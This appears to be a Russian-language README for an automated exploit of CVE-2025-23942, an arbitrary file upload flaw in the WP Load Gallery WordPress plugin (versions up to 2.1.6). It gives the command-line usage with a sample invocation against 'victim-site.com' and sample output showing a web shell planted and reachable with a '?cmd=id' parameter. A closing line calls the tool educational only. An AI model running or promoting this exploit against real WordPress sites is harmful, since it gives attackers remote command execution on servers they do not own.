
WP Load Gallery <= 2.1.6 - Произвольная загрузка файлов для аутентифицированных пользователей (Автор+)
Уязвимость неограниченной загрузки файлов опасного типа (Unrestricted Upload of File with Dangerous Type) в плагине NgocCode WP Load Gallery позволяет загрузить веб-шелл на веб-сервер. Проблема затрагивает WP Load Gallery: с n/a по 2.1.6.
✅ Автоматическая эксплуатация – автоматически извлекает nonce, выполняет вход и загружает шелл.
✅ Проверка версии – подтверждает, уязвима ли цель, перед началом эксплуатации.
✅ Обработка ошибок – обеспечивает стабильное выполнение даже при сбоях.
✅ Управление сессиями – использует постоянное управление сессиями для аутентификации.
✅ Обратная связь в реальном времени – выводит результат на каждом шаге.
requests (pip install requests)Запустите скрипт с необходимыми параметрами:
usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit WP Load Gallery - Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., https://example.com)
-un USERNAME, --username USERNAME
WordPress Username
-p PASSWORD, --password PASSWORD
WordPress Password
Пример:
python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123
_______ ________ ___ ___ ___ _____ ___ ____ ___ _ _ ___
/ ____\ \ / / ____| |__ \ / _ \__ \| ____| |__ \|___ \ / _ \| || |__ \
| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
| | \ \/ / | __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__ _/ /
| |____ \ / | |____ / /_| |_| / /_ ___) | / /_ ___) | / / | |/ /_
\_____| \/ |______| |____|\___/____|____/ |____|____/ /_/ |_|____|
[+] Checking plugin version...
[+] Detected version: 2.1.6
[+] The target is vulnerable! Proceeding with exploitation...
[+] Logged in successfully.
[+] Extracting wplg_nonce...
[+] Extracted wplg_nonce: a1b2c3d4e5
[+] Uploading shell...
[+] File uploaded successfully!
[+] Shell is accessible at: http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id
Данный эксплойт предназначен только для образовательных целей и исследований в области безопасности. Не используйте его на системах, которыми вы не владеете или для тестирования которых у вас нет явного разрешения. Автор не несёт ответственности за любое неправомерное использование этого скрипта. ( Khaled_alenazi )